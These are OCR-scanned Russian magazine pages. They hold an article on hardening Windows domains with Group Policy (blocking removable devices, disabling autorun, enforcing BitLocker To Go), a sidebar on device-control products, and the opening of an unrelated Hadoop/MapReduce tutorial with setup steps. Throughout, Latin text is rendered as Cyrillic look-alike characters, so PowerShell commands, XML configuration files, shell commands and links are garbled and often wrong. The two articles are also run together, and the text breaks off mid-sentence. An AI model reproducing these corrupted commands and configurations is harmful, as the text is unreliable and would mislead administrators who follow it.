являются частью ОС и охватывают всевозможные настройки — 
учетные записи, параметры ОС и безопасности, аудит, конфигура- 
цию устройств и многое другое. Правильной настройке групповых 
политик новички обычно не уделяют должного внимания, считая 
их маловажными, запутанными и неинтересными. Между тем уста- 
новки 6Р по умолчанию не всегда оптимальны и не гарантируют 
должный уровень безопасности, поэтому ознакомиться с некото- 
рыми из политик следует в обязательном порядке. 

Политики делят на локальные и доменные, применить их можно 
для всего домена или подразделения, индивидуального компью- 
тера или учетной записи. После настройки 6Р0 подхватываются 
всеми системами автоматически, достаточно пользователю или 
ПК подключиться к домену. На клиентской стороне интерпре- 
тацией 6Р0 занимаются расширения СІіепІ бісіе Ехіепзіоп (С5Е), 
они специфичны для каждой версии ОС ѴѴіпсІоѵѵз и также требуют 
периодического обновления. Возможности ОР растут от версии к 
версии. Так, в ОС ѴѴіп2к8/7 доступно более 3000 политик. Полный 
список можно найти в документах по адресу: сІск.ги/ОхбТА . 

Локальные политики настраиваются при помощи оснаст- 
ки дресІіЕтзс, централизованное управление 6Р0 в домене 
производится при помощи консоли «Управление групповой 
политикой» (бгоир Роіісу Мападетепі Сопзоіе, СРМС.тзс). Часть 
параметров в этих консолях совпадает, но для домена доступны 
и специфические настройки, поэтому далее будем вести речь о 
возможностях СРМС. 

Оснастка СРМС автоматически устанавливается на сер- 
вере вместе с ролью «Доменные службы АсЛѵе йігесіогу» 

(АсЛѵе й ігесіогу Ротаіп бегѵісез). Если компьютер не является 
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Отчет по политикам в консоли 6РМС 



контроллером домена, СРМС можно установить из диспетчера 
сервера, добавив соответствующий компонент. Или при помощи 
РоѵѵегБЬеІІ: 

Р5> Ітрогѣ-Мосіиіе 5егѵегМапа§ег 
Р5> АсІсІ-1л(іпсІоы5Реа1:ипе СРМС 

Чтобы управлять настройками групповых политик из ѴѴіп7, 
потребуется установить Р5АТ (Ретоіе Бегѵег Асітіпізігаііоп Тооіз, 
сІск.ги/ОхЦРа ]. Еще один полезный и бесплатный инструмент, о 
котором нужно знать при работе с 6Р0, — АбѵапсесІ Згоир Роіісу 
Мападетепі (А6РМ, расширенное управление политиками групп, 
с1ск.ги/0хЦ5и ), позволяющий редактировать 6Р0 в автономном 
режиме, поддерживается контроль версий, бэкап настроек и деле- 
гирование прав на настройки (админ затем просто подтверждает 
новые СРО). 

Получить информацию о текущих установках СРО можно, за- 
пустив в консоли СРМС «Мастер результатов групповой политики», 
для локальной системы — дргезиІСехе. 

Кроме этого, после установки роли Ай 05 (или консоли СРМС) 
станет доступным ряд командлетов РоѵѵегБЬеІІ, позволяющих 
автоматизировать все этапы работы с групповыми политиками — 
создание, изменение, удаление, копирование, резервирование 
и восстановление 6Р0. Чтобы получить полный список нужных 
командлетов, набираем: 

Р5> Ітрогіі-Мосіиіе §гоирр_о1ісу 

Р5> Сеіі-Соттапсі -тосіиіе §гоирро1ісѵ 

Теперь просмотрим список всех политик, применяемых на до- 
мене, их статус и выведем отчет по политикам: 

Р5> 6е1=-6РО -АН 

Р5> СеІг-СРОКерогі: -АН -КерогЕТ у ре Ні=т1 - Раіііі С:\ а11 § ро.Іі1=т1 

В домене после его создания уже существуют две политики 
(«Политика домена по умолчанию» и «Политика по умолчанию для 
контроллеров домена»), для дальнейших настроек создадим новую 
политику, в которой и будем производить все настройки. Вызываем 
СРМС, выбираем домен, переходим в подпункт «Объекты группо- 
вой политики» и в контекстном меню выбираем пункт «Создать». 

По запросу задаем имя и описание, новая политика появится в 
списке. Для редактирования в контекстном меню выбираем пункт 
«Изменить», после чего запустится консоль «Редактор управления 
групповыми политиками». 

Теперь рассмотрим политики, которые помогут повысить общий 
уровень безопасности в организации. 




Политики, ограничивающие использование устройств 



БЛОКИРУЕМ ВНЕШНИЕ УСТРОЙСТВА 



Сегодня одной из проблем безопасности является неконтролируе- 
мое использование внешних устройств сотрудниками организации, 
которое повышает риски утечки конфиденциальной информации 
или заражения вирусом. Проблема настолько серьезна, что не- 
которые администраторы подходят к ней радикально, отключая все 
внешние порты в ВІ05 или настройках ОС. В ряде случаев приме- 
няют специализированное ПО. Но с выходом Ѵ\/іп2к8/7 эта проблема 
решается штатными средствами ОС. Теперь при помощи групповых 
политик администратор может запретить использование всех или 
некоторых внешних устройств, задать список разрешенных, устано- 
вить обязательное шифрование данных и отключить автозапуск. 

Все ограничения на использование устройств задаются в раз- 
деле «Конфигурация компьютера -> Политики -> Административные 
шаблоны -> Система -> Установка устройства». Здесь находим ряд 
интересных параметров, но нас сейчас интересует единственный 
подраздел — «Ограничения на установку устройств». Он содержит 
десять политик, позволяющих реализовать практически любой 
сценарий. Например, активация «Запретить установку съемных 
устройств» (Ргеѵепі іпзіаііаііоп о{ гетоѵаЫе сіеѵісез) не позво- 
лит пользователям подключать любой девайс, драйвер которого 
описывает его как съемное. Конечно, это самый крайний случай, 
ведь некоторым пользователям возможность подключения флешек 
или смартфонов необходима по работе (скажем, для синхронизации 
календаря или документов), поэтому жесткое ограничение непри- 
емлемо. Ситуацию могут исправить несколько установок. 

Например, чтобы администраторы могли устанавливать устрой- 
ства, несмотря на ограничения политик, активируем пункт«Разре- 
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Контролируем автозапуск при помощи 6Р0 




Настраиваем политики доступа к сменным устройствам 



шить администраторам заменять политики ограничения установки 
устройств» (АІІоѵѵ асіппіпізігаіогз Іо оѵеггісіе йеѵісе Іпзіаііаііоп 
Резігісііоп роіісіез). Теперь шеф, имеющий права локального адми- 
нистратора на своем ноутбуке, сам решает, что ему подключать, а 
что нет. 

Но можно позволить и самим пользователям самостоятельно 
устанавливать устройства определенного типа. В этом случае лучшим 
вариантом будет разрешить то, что можно, остальное запретить. 
Поэтому активируем политику «Разрешить установку устройств, соот- 
ветствующих какому-либо из этих кодов устройств» (АІІоѵѵ іпзіаііаііоп 
о{ сіеѵісез 1Ьа1 таІсЬ апу о{ іЬезе беѵісе Юз) или «Разрешить установку 
устройств с использованием драйверов, соответствующих этим клас- 
сам установки устройств» (АІІоѵѵ іпзіаііаііоп о{ сіеѵісез изіпд сігіѵегз 
1Ьа1 таІсЬ іЬезе беѵісе зеіир сіаззез). Их отличие состоит в том, что в 
первом случае задается ИД оборудования, во втором — используется 
идентификатор 611 Ю. Соответствующие значения можно подсмотреть 
в «Диспетчере устройств», во вкладке «Сведения», выбрав в раскры- 
вающемся списке нужный параметр (ИД оборудования, 61ІЮ класса 
устройств). Вместе с указанными политиками обязательно следует 
активировать «Запретить установку устройств, не описанных другими 
параметрами политики» (Ргеѵепі іпзіаііаііоп о{ сіеѵісез по* сІезсгіЬесІ Ьу 
оіЬег роіісу зеШпдз). Кроме этого, есть и аналогичные запрещающие 
политики, которые отслеживают устройства по ИД и 61ІЮ и позволя- 
ют создать свой «черный список». Тут нужно помнить, что произво- 
дители описывают ИД своего устройства весьма произвольно, в итоге 
одно устройство может относиться к нескольким классам (это легко 
определить, посмотрев свойства). Поэтому, используя ИД, нужно быть 
аккуратным, так какзапрет можно обойти или заблокировать другие 
«родственные» девайсы. При создании политик нужно использо- 
вать данные не только из списка «ИД оборудования», но и из списка 



«Совместимые ИД». При большом количестве флешек и устройств от 
разных производителей придется потрудиться. С 61ІЮ в этом отноше- 
нии проще, они более универсальны. Хотя это дело можно поручить 
скриптам на РоѵѵегБЬеІІ. 

Определить ІІ5В-флешки при помощи РоѵѵегЗЬеІІ можно не- 
сколькими способами: опросив ѴѴМІ-классы ѴѴіп32_0ізк0гіѵе, 
ѴѴіп32_ѴоІііте, \Л/іп32_І_одісаЮізк или \Л/іп32_РІМРЕпМу. Следующая 
команда РоѵѵегЗЬеІІ покажет список всех устройств и их характери- 
стики: 

Р5> Се1:-ІлІтіОЬдес1: ІлІіп32_РІ\ІРЕп1:і1:у 

Теперь при подключении постороннего устройства оно будет 
заблокировано, а пользователь получит системное предупреждение 
(кстати, его можно настроить, отредактировав политики «Отобра- 
жать специальное сообщение, когда установка запрещена параме- 
тром политики» и «Отображать заголовок специального сообщения, 
когда установка устройства запрещена параметром политики»). 

Чтобы предотвратить выполнение аиіогип-вирусов, следует 
отключить автозапуск внешних устройств. Для этого переходим в 
раздел «Конфигурация компьютера -> Административные шаблоны 
-> Компоненты ѴѴіпсІоѵѵз -> Политики автозапуска», выбираем и 
включаем политику «Отключить автозапуск». По умолчанию под за- 
прет попадают все устройства, но в раскрывающемся списке можно 
изменить значение на компакт-диски и устройства со съемным 
носителем. Политика «Вариант работы автозапуска по умолчанию» 
позволяет контролировать выполнение команд автозапуска, про- 
писанных в аиІогип.іпГ Кроме этого, доступна политика, позволяю- 
щая отключить автозапуск для устройств, не являющихся томами 
(например, использующих протокол передачи мультимедиа МТР). 
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ПРОГРАММЫ ДЛЯ КОНТРОЛЯ ДОСТУПА К СМЕННЫМ УСТРОЙСТВАМ 


• В ОС ѴѴіп2к8/7 
доступно более 3000 
ПОЛИТИК, полный 


Проблема доступа к сменным 
устройствам известна давно. Для ее 
решения разными разработчиками 
был предложен ряд продуктов, со 
временем выросших из программы 
контроля устройств в ОІ_Р-системы 
и предлагающих большое количество 
функций по контролю устройств на 
основании пользователя/группы, типа 


устройства и времени работы. При этом 
в зависимости от ситуации пользователь 
получает полный или ограниченный 
(только чтение) доступ. Все действия 
пользователей журналируются, доступна 
система отчетов, операции теневого 
копирования позволяют впоследствии 
определить утечку. Некоторые из 
них способны анализировать контент 


и блокировать устройство при попытке 
копирования конфиденциальных файлов. 
Наиболее популярны среди программ 
такого рода: ОеѵісеІ_оск Епсіроіп* 01_Р 
5иі*е (ѵѵѵѵѵѵ.сіеѵісеіоск.ги). 21оск (зесигі*. 
ги/ргосіисІз/іпЫіІоск). 0еѵісе1п5оес*ог 
(сіеѵісеіпзресіог.ги. достѵпна бесплатная 
версия до 10 ПК) и РіІеСопІгоІ ( есопігоі. 
ги). 


СПИСОК СРО можно 
найти в документах: 

сІск.ги/ОхБТА: 

• для управления 
групповыми 
политиками из ѴѴіп7 
потребуется Р5АТ: 

сІск.ги/ОхІІРа: 

• страница АбРМ: 

сІск.ги/ОхОБи. 
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По единым правилам 




Определяем ИД оборудования 



КОНТРОЛИРУЕМ ОПЕРАЦИИ С ВНЕШНИМИ 
УСТРОЙСТВАМИ 



Простая блокировка или разрешение использования внешних 
устройств не является гибким подходом. Например, в организации 
часто проводятся различного рода семинары, на которых гости при- 
ходят со своими устройствами, не заставишьже их перед началом 
ивента регистрировать у админа свои флешки. Но в этом и нет не- 
обходимости: групповые политики позволяют ограничить операции, 
которые могут производить пользователи, подключив внешнее 
устройство. Например, разрешив только чтение, мы не позволим 
унести данные с компьютера, а запрет на выполнение позволит 
защититься от вирусов. Соответствующие политики настраиваются 
в «Конфигурация компьютера -> Административные шаблоны -> 
Система -> Доступ к съемным запоминающим устройствам». Здесь 
находим 19 настроек. Если присмотреться, то часть из них похожи и 
отличаются только устройствами, на которые они распространяются: 
компакт/ОѴй-диски, съемные диски, ленточные и накопители на 
гибких дисках, ѴѴРй-устройства (ѴѴіпсІоѵѵз РогІаЫе йеѵісе, мобиль- 
ныетелефоны, устройства под управлением ѴѴіпСЕ и тому подобное). 
Для каждого типа можно установить запрет на выполнение, чтение 
и запись. Отдельные политики позволяют контролировать прямой 
доступ к съемным ЗУ при удаленных сеансах (по умолчанию запре- 
щен) и доступ к нестандартным устройствам (чтобы их прописать, 
необходимо указать 0111 Р). 



ШИФРОВАНИЕ ДАННЫХ НА ВНЕШНИХ УСТРОЙСТВАХ 



В ѴѴіп7/2к8Р2 появилась технология ВіШоскег То 6о, которая яв- 
ляется дальнейшим развитием ВіИоскег и позволяет шифровать 
данные на любых сменных девайсах (внешних приводах, Бй-картах 
и ІІБВ-накопителях). Доступ к зашифрованным носителям возможен 
по паролю или смарт-карте с любого компьютера. Хотя при не- 
обходимости список ПК, с которых разрешено чтение информации, 
также можно ограничить, что не позволит вынести информацию за 
пределы контролируемой зоны. Также можно настроить принуди- 
тельное использование ВіШоскегТо Со в случае копирования любой 
информации на сменный носитель. Все настройки производятся в 
разделе «Конфигурация компьютера -> Политики -> Администра- 
тивные шаблоны -> Компоненты ѴѴіпсІоѵѵз -> Шифрование диска 
ВіШоскег -> Съемные диски с данными». Активация политики 
«Управление использованием ВіШоскегдля съемных дисков» 
разрешает шифрование для съемных дисков. Чтобы пользовате- 
ли не могли самостоятельно отключать ВіШоскегТо Со, следует 
обязательно снять флажок «Разрешить пользователям временно 
приостанавливать защиту ВіШоскег и расшифровывать диски с 
данными». Еще одна полезная политика — «Запретить запись на 
съемные диски, не защищенные ВіШоскег», при ее активации все 



носители, не защищенные ВіШоскег, подключаются в режиме только 
для чтения. Причем эта политика имеет дополнительный параметр, 
позволяющий запретить запись на носители, настроенные в другой 
организации. Если он активирован, то необходимо задать специфи- 
ческие идентификаторы в политике «Укажите уникальные иденти- 
фикаторы для организации» (находится на уровень выше по дереву). 
На уже существующих дисках идентификатор можно задавать при 
помощи тападе-ЬсІе.ехе. 

Пользователи всегда стараются облегчить себе жизнь, устанав- 
ливая простые пароли, которые без труда можно подобрать. Лучшим 
выходом из ситуации является применение политики «Настроить 
использование паролей для съемных дисков сданными», позво- 
ляющей задать минимальную длину пароля и его сложность. Или 
как вариант: разрешаем использование смарт-карт, активировав 
политику «Настроить использование смарт-карт на съемных дисках 
с данными», после чего будет доступен дополнительный флажок, 
установка которого будет требовать принудительного использова- 
ния смарт-карт. 



ЗАКЛЮЧЕНИЕ 



Штатные инструменты СРО просты и понятны, а документация 
позволяет разобраться со всеми нюансами использования. И 
главное — их возможностей вполне достаточно для реализации 
подавляющего большинства стандартных сценариев. □С 



ЫЕТѵѵтхбкоирроисѵ 

СНАІЧСЕ ВЕРОКТЕВ 



Если с установкой СРО штатные инструменты 
ѴѴіпсіоѵѵз вполне справляются, то с 
отслеживанием изменений, особенно при 
работе нескольких админов в большой среде, 
возникают проблемы. Здесь на помощь приходят 
разработки третьих фирм. Одна из самых 
известных — МеІѴѴгіх Огоир Роіісу СИапде Верогі- 
ег [ пеіѵѵгіх.ги ). которая доступна в двух версиях: 
бесплатной и коммерческой. Ее использование 
позволяет получить информацию обо всех 
изменениях СРО: кто настроил новую политику, 
отключил объект 6Р0 от подразделения 
или отменил усиленную политику паролей. 
Администратор по всем изменениям получает 
подробный отчет, в котором показаны все 
параметры до и после, упрощается откат до 
предыдущих значений, создание резервных 
копий и восстановление объектов СРО, ведение 
долгосрочных архивов (этого требуют некоторые 
стандарты безопасности) и многое другое. 
Установить МеІѴѴгіх 6РСВ можно на любой 
компьютер, работающий под управлением 
ѴѴіпХРзрЗ и выше, для хранения отчетов 
используется МБ БОЕ Бегѵег от 2005, в том числе 
и бесплатный ЕхргезБ Есііііоп. 

Есть и комплексное решение Меі- 
ѴѴгіх СИапде Рерогіе г Биііе, позволяющее 
контролировать установки популярных 
сервисов и продуктов — Асііѵе йігесіогу, 

СРО, МБ ЕхсЬапде, файловый сервер, 5СѴММ, 
БОЬ Бегѵег, ѴМѵѵаге, БИагеРоіпІ. 

Расширенные функции управления СРО 
предлагает и СРОАОтіп от Оие5І Боііѵѵаге 
( иезІ-зоНѵѵаге.ги/дроасітіп ). 



ГТШ 

• Самым нижним 
уровнем, к 
которому можно 
привязать СРО в 
домене, является 
подразделение. 

• Централизованное 
управление 

СРО в домене 
производится при 
помощи консоли 
СРМС.тзс. 

• Локальные 
политики 

настраиваются при 
помощи оснастки 
дресііі.тзс. 

• Для максимальной 
поддержки 
групповых политик 
клиентская 

и серверная 
операционная 
система должны 
быть одного 
выпуска, то есть 
ѴѴіп2к8Р2 — ѴѴіп- 
сІоѵѵз7,ѴѴіп2к8 — 
Ѵізіа и так далее. 

• Обновление 
политик происходит 
автоматические 
периодичностью 90 
минут, с вариацией 
+/-30 минут, для 
исключения 
перегрузки 
контроллера домена; 
для контроллеров 
домена интервал 
обновлений 
составляет 5 минут. 

• Полный список 
всех классов ѴѴМІ 
можно получить, 
введя команду Сеі:- 
ІлІтіОЬіесІ: -Из*. 
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5УЫ/АСК 



Евгений Зобнин (ехесЬіІ.ги) 




В последние годы идея распределенной 
обработки данных стала невероятно 
популярной. Все больше организаций 
отказываются от дорогостоящих 
высокопроизводительных серверов в пользу 
кластеров, состоящих из недорогих машин 
класса Іо\л/-епсІ. Однако чтобы завести такой 
кластер и заставить его делать то, чего хотим 
конкретно мы, нужен правильный инструмент. 
И сегодня стандартом среди подобных 
инструментов является фреймворк Насіоор. 




Насіоор — это имя игрушечного слоненка, принадлежащего ребенку Дуга Каттинга 



ПРЕДИСЛОВИЕ 



Уверен, что для большинства читателей Насіоор не является чем-то 
новым и совершенно неизвестным. Все мы знаем о его внедрении 
такими сервисами, как ѴаЬоо, РасеЬок, Разит. Все мы слышали 
о невероятной масштабируемости приложений, написанных с ис- 
пользованием инструментов фреймворка. Многие читали или хотя 
бы просматривали доклады и статьи, посвященные технологии 
распределенной обработки данных МарРебисе, активно применяе- 
мой в сервисах компании Воодіе. Тем не менее для многих Набоор 
остается неизведанным миром, который далек от стандартных 
понятий «сервер — клиент» и «одна машина — одна задача». 



ИСТОРИЯ И ВЗГЛЯД СО СТОРОНЫ 



В 2004 году Дуг Каттинг прочитал публикацию сотрудников Воодіе 
о новой технологии распределенной обработки данных под на- 
званием МарРебисе и настолько был впечатлен прочитанным, что 
решил инициировать создание собственного открытого фреймвор- 
ка распределенных вычислений, основанного на идеях поискового 
гиганта. Изначально предполагалось, что проект станет базой для 
поисковой машины І\ІиІсЬ, однако в будущем автор отказался от 
этой идеи, сделав Набоор обособленной разработкой. 

Во многом этому способствовала компания ѴаИоо, которая 
в начале 2006 года пригласила Каттинга в качестве ведущего 
специалиста по созданию распределенной инфраструктуры, осно- 
ванной на уже сделанных в рамках проекта наработках. Спустя два 
года Набоор был использован для запуска кластерной поисковой 
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Запускаем задание МарКесІисе на выполнение 



системы из 10 тысяч процессорных ядер, а сам проект передан 
фонду АрасЬе. Этот момент стал ключевым в развитии проекта, 
о Набоор начали активно писать в новостях, блогах, им заинтере- 
совались многие интернет-компании. 

Технологию взяли на вооружение такие гиганты, как Ьаз^Тт, 
РасеЬоок, ТЬе ІЧеѵѵ Ѵогк Тітез, ЕВау. Исследования, проведенные 
в апреле 2008 года, показали правильность выбора технологии: 
Набоор побил мировой рекорд производительности сортировки 
данных, обработав 1 Тб информации за 309 секунд на кластере из 
910 узлов. Эти события еще больше подогрели интерес к новой 
разработке, в результате чего к 2010 году Набоор превратился 
в самую известную и обсуждаемую технологию «больших данных». 
И это несмотря на то, что первый стабильный релиз фреймворка 
состоялся только в конце прошлого года. 

В чем же изюминка Набоор и почему он так быстро получил 
широкое распространение и всеобщее одобрение? Чтобы ответить 
на этот вопрос, мы должны более детально рассмотреть ключевую 
технологию, лежащую в его основе, а именно модель вычислений 
с говорящим названием МарРебисе. 



задания для узлов, но и свертку результатов и приведение их 
к общему виду. Другими словами, задача обработки информации 
в МарРебисе всегда решается на уровне небольших блоков и с 
помощью множества машин, снимая с головного сервера работу по 
получению окончательных результатов. 

Несмотря на то что МарРебисе подходит для выполнения 
далеко не всех типов задач (по сути, он рассчитан только на за- 
дачи по свертке данных, такие, например, как получение таблицы 
со списком всех слов и частотой их использования из текстового 
файла), он решает сразу две проблемы классических моделей 
распределенных вычислений. Во-первых, головной сервер никак 
не участвует в обработке данных, благодаря чему производитель- 
ность кластера приближается к общей суммарной производитель- 
ности всех его узлов. Во-вторых, ни одному из узлов не приходится 
иметь дело с действительно большими объемами информации, 
которые могут просто-напросто не уместиться в память машины. 
Любая задача размазывается по узлам кластера равномерно, не 
перегружая ни один из них. 

Кроме самого алгоритма МарРебисе, в Набоор реализован 
также и механизм защиты от сбоев, основанный на избыточности. 
Как и боодіе, разработчики Набоор полагают, что для выполнения 
заданий будут использованы стандартные дешевые серверы или 
даже обычные настольные ПК, которые могут умирать, даже не 
издав предсмертного крика. По этой причине механизм защиты от 
сбоев в Набоор реализован по принципу «незаменимых не быва- 
ет»: если один из узлов перестает отвечать на запросы головного 
сервера или затягивает выполнение работы, его задание пере- 
дается другому узлу, а конечный результат будет принят у того, кто 
быстрее закончит работу. 

К сожалению, в этой статье я не могу привести детальное опи- 
сание МарРебисе из-за необычности самого алгоритма, который 
требует большого теоретического введения (для людей, незна- 
комых с ФП). Все заинтересованные могут прочитать введение 
в МарРебисе, пройдя по ссылкам, приведенным в боковых выно- 
сах. А мы пока попробуем разобраться, как Набоор удается хранить 
данные петабайтных размеров. 



МАРКЕОІІСЕ, ИЛИ КАК СКОРМИТЬ ПЕТАБАЙТЫ 
ДАННЫХ ТЫСЯЧАМ МАШИН ШЩЯШШШШЪ, 



Именно МарРебисе, несложный, но весьма интересный и свежий 
подход к распределенным вычислениям, и сделал Набоор столь 
производительным и привлекательным в глазах крупных компаний. 
Изначально этот метод, предложенный Джеффри Дином и Санжаем 
Гемаватом, использовался и обкатывался только внутри боодіе, 
однако после публикации в 2004 году документа с подробным 
описанием МарРебисе им заинтересовались многие программисты 
и архитекторы высоконагруженных систем и буквально за один год 
превратили ее в стандарт распределенной обработки данных. 

Кроме Набоор, МарРебисе был реализован во многих откры- 
тых и закрытых проектах, включая компонент библиотеки 01 под 
названием Сопсиггепі, СоисбОВ, МопдобВ и Оізсо (реализация на 
языке Егіапд от компании ІМокіа). Несмотря на то что технология 
была запатентована боодіе, поисковый гигант не требуетза ее ис- 
пользование лицензионных отчислений и даже предоставил права 
на безвозмездное использование МарРебисе фонду Арасбе. 

Что же такое МарРебисе? Говоря простым языком, это способ 
обработки данных множеством машин, основанный на разбиении 
входных данных и последующей сборке результатов их обработки 
для формирования конечного результата. На первый взгляд он 
очень похож на любые другие алгоритмы распределенной об- 
работки данных, однако имеет свою изюминку, благодаря которой 
может обрабатывать огромные объемы информации (измеряемые 
в петабайтах) за очень небольшие сроки. 

Если говорить просто и не вдаваться в подробности функ- 
ционального программирования, на идеях которого и основан 
метод, МарРебисе отличается умением распараллелить не только 
предварительную обработку данных после разбиения задачи на 



НРР5, ИЛИ КАК ЗАСУНУТЬ СЛОНА В ХОЛОДИЛЬНИК 



Вторая фундаментальная технология, лежащая в основе Набоор, — 
это распределенная файловая система НбРВ. Как и МарРебисе, она 
почти полностью скопирована с файловой системы СРВ, применяе- 
мой в боодіе, поэтому все, что ты знаешь о СРВ, можно с вероятно- 
стью в 90% применить и к файловой системе Набоор. 

Как и многие другие распределенные файловые системы, НйРВ 
позволяет распределить данные на множество узлов кластера, до- 
ступ к которым можно получить с помощью единой «точки входа». 
Основной упор при разработке этой ФС был сделан на высокую 




Архитектура НЮР5 
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Как НШР5 реплицирует блоки данных 

отказоустойчивость (что, в общем-то, свойственно всем подобным 
ФС), производительность и возможность хранения действительно 
больших файлов, вплоть до нескольких петабайт. 

Достигаются эти характеристики за счет использования 
довольно простых механизмов. Способность хранить большие 
объемы данных связана с использованием поблочного метода 
хранения. Каждый узел кластера хранит блоки фиксированного 
размера, которые Н0Р5-клиент формирует и отсылает узлам по 
мере накопления данных. Чтобы гарантировать целостность бло- 
ков, клиент формирует контрольные суммы для каждых 512 байт 
и также отсылает их узлам кластера. Благодаря распределению 
задач, при котором значительную и самую ресурсоемкую часть 
работы выполняет клиент, удается разгрузить узлы, ответственные 
непосредственно за хранение и отдачу данных, и таким образом 
поднять общую производительность кластера. 

Другое архитектурное решение НБР5 заключается в исполь- 
зовании выделенного сервера для работы с метаданными. Этот 
подход впервые был применен в І_из{ге и до сих пор является 
стандартом во всех серьезных распределенных ФС. Сервер мета- 
данных (который в РЮР5 носит имя ИатеИосІе) хранит информа- 
цию о именах файлов, их размере, каталоговых записях, правах 
доступа и адресах блоков, расположенных непосредственно на 
узлах хранения (ОаіаІЧобе). Обычно І\ІатеІ\Іобе размещается на 
высокопроизводительном сервере, находящемся в непосредствен- 
ной близости от клиентов, что обеспечивает высокую скорость 
обработки запросов доступа к файлам, хотя сам процесс записи/ 
считывания блоков происходит в обход сервера имен и осущест- 
вляется напрямую между клиентом и узлом. 

Для обеспечения отказоустойчивости РЮР5 использует метод 
репликации данных на несколько узлов. Когда клиент создает файл, 
І\ІатеІ\Іобе возвращает ему список адресов узлов, подходящих для 
хранения этого файла, клиент устанавливает соединение с ближай- 
шим из них, передает список других узлов и начинает процесс запи- 
си файла, поочередно передавая узлу все новые блоки данных. По 
мере получения блоков данныхузел устанавливает соединение со 
следующим узлом из списка и передает блоки ему, тот, в свою оче- 
редь, передает блоки следующему узлу. Если в дальнейшем один из 
узлов выйдет из строя, незамедлительно начнется процесс репли- 
кации блоков на новые узлы. Такой подход позволяет, во-первых, 
обеспечить высокий уровень надежности хранения информации, 
а во-вторых, поднять производительность за счет возможности кли- 
ента сделать выбор между получением данных сразу с нескольких 
узлов или ближайшего узла, имеющего копию нужного блока. 

Чтобы ІЧатеБегѵег не стал единственной точкой отказа, ад- 
министратор может назначить резервные серверы имен, которые 
смогут взять на себя обязанности головного сервера в случае сбоя. 
Пока главный сервер имен будет в строю, вторичный сервер будет 
постоянно синхронизировать свое состояние с ним, чтобы не до- 
пустить последующей потери метаданных. 




Как работает МарРесІисе 

Каждый сервер имен снабжен веб-интерфейсом, который 
позволяет просматривать статистику использования файловой си- 
стемы, состояние кластера, произвести оценку объема хранящихся 
файлов, а также просмотреть содержимое файловой системы. 



НАйООР СОММОЙ 



Поверх МарРебисе и БШР5 в Набоор реализован набор инстру- 
ментов управления ЕЮР5 и средств развертывания кластерной 
инфраструктуры. Основной компонент Набоор Соттоп — это 
интерпретатор командной строки для работы с РШР5, созданный 
под впечатлением от интерпретатора ІЭ N IX. 

Он реализован как часть универсального инструмента Набоор 
и реализует большую часть команд II N IX по управлению файлами, 
такими как са{, сЬтоб, сЬоѵѵп, сЬдгр, ср, би, Із, ткбіг, тѵ, гт, ІаіІ 
и так далее. Для их вызова используется следующий синтаксис: 

$ Набоор ~р5 -команда ЦРІ 

Кроме интерфейса к файловой системе, в инструменте Набоор 
также реализован набор средств для развертывания и мониторинга 
кластера, управления кластером и контроля выполняемых задач. 



ИСПОЛЬЗОВАНИЕ 



В этой статье мы не будем рассматривать пример с развертыва- 
нием целого кластера, а остановимся на знакомстве с базовыми 
возможностями фреймворка, благо для этого в нем есть тестовый 
режим, позволяющий эмулировать работу кластера на одной физи- 
ческой машине. 

Набоор целиком и полностью написан на баѵа, поэтому перед 
установкой фреймворка придется обзавестись одноименной 
средой исполнения. В качестве операционной системы для 
тестирования и разработки подойдет Ыпих или ѴѴіпбоѵѵз, однако 
разработчики замечают, что серьезных тестов Набоор-кластеров 
на ѴѴіп32 не проводилось, поэтому рекомендуют использовать для 
этих целей Ыпих. Я, как прожженный юниксоид, буду использовать 
для запуска Набоор машину под управлением Ыпих, но все при- 
веденные команды подойдут и для виндового сервера, поскольку 
их выполнение должно происходить в среде Судѵѵіп. 

Итак, для начала устанавливаем в систему баѵа 1.6, а так- 
же 55Н-сервер (в ѴѴіпбоѵѵз он должен быть установлен вместе 
с Судѵѵіп). После этого скачиваем Набоор со страницы доо.дІ/ШЕЗп 
(на момент написания статьи последней версией была 1.0.2, поэто- 
му перед загрузкой проверь наличие более свежей версии). 

После завершения загрузки распаковываем архив и редак- 
тируем конфигурационные файлы так, чтобы все демоны Набоор 
запускались на локальной машине (это и есть эмуляция кластера). 
В файл соп{/соге-5ІІе.хтІ пишем следующее: 

<сопй§ига1:1оп> 
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Внедрение МарРесІисе в сервисы боодіе началось еще в 2003 году 



<рпореп1:у> 

<пате>-Рз .бе-РаиІІ: . пате</пате> 
<ѵа1ие>М-р5 ://1оса1бов1: :9000</ѵа1ие> 
</ргорег1:у> 

</сопб§ига1:ірп> 



<рпорег1:у> 

<пате>таргесІ . ]оЬ .1:гаскег</пате> 
<ѵа1ие>1оса1бо5І: :9001</ѵа1ие> 
</ ргорегЕу> 

</сопб§ига1:ірп> 



Это конфигурационный файл головного сервера, здесь мы 
указали адрес НОРБ-сервера. Далее необходимо отредакти- 
ровать конфигурацию демона РШР5, располагающуюся в сопіѴ 
ЬсНз-зіІе.хтІ, и указать, что репликация данных должна осу- 
ществляться только на один узел ОаІаІМобе (другими словами, 
отключаем избыточность): 

<сопб§ига1:іоп> 

<ргорег1:у> 

<пате>б-Рз . гер1іса1:іоп</пате> 

<ѵа1ие>1</ѵа1ие> 

</ргорег1:у> 

</сопб%ига1:іоп> 

Также редактируем конфигдемона МарРебисе сопіѴтаргеб-зіІе. 
хті, в котором указываем адрес боЬ-трекера — сервера, ответ- 
ственного за управление МарРебисе-заданиями. Как и в первом 
конфиге, указываем адрес текущей машины: 

<сопб§ига1:іоп> 
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Создаем новую файловую систему 



Также необходимо отредактировать скрипт сопЩіабоор.епѵ, 
указав в переменной 6АѴА_Н0МЕ путь до инсталляции баѵа (ее 
адрес можно выяснить с помощью команды «ѵѵЬісЬ )аѵа»): 

ехрогі: ЗАѴА_НОМЕ=/ор1:/заѵа 

Все компоненты Набоор общаются используя 55Н, поэтому сто- 
ит заранее проверить, можешь ли ты зайти на локальную машину 
без пароля: 

$ ззб Іосаібозі: 

Если команда потребует пароль, придется произвести обмен 
ключами: 

$ ззб-кеу§еп -1: бза -Р ' ' -Т ~/ . ззб/іб^бза 
$ саі: ~/.ззІі/іб бза.риЬ >> ~/.ззб/аи1=богІ2еб кеуз 

Если ты ранее уже генерировал открытый ключ, первую коман- 
ду можно пропустить. Теперь можно приступить к развертыванию 
«кластера». Для этого сначала создаем новую распределенную ФС 
(все дальнейшие команды следует выполнять, находясь в корне- 
вом каталоге Набоор): 

$ Ьіп/бабоор патепобе -Тогтаі: 

Далее исполняем скрипт, который запустит все необходимые 
демоны на одной машине: 

$ Ьі п/з1=аг1=-а11. зб 

В результате в системе должны появиться четыре баѵа- 
процесса: МатеЫобе, ОаІаІМобе (компоненты Н0Р5), ЭоЬТгаскег 
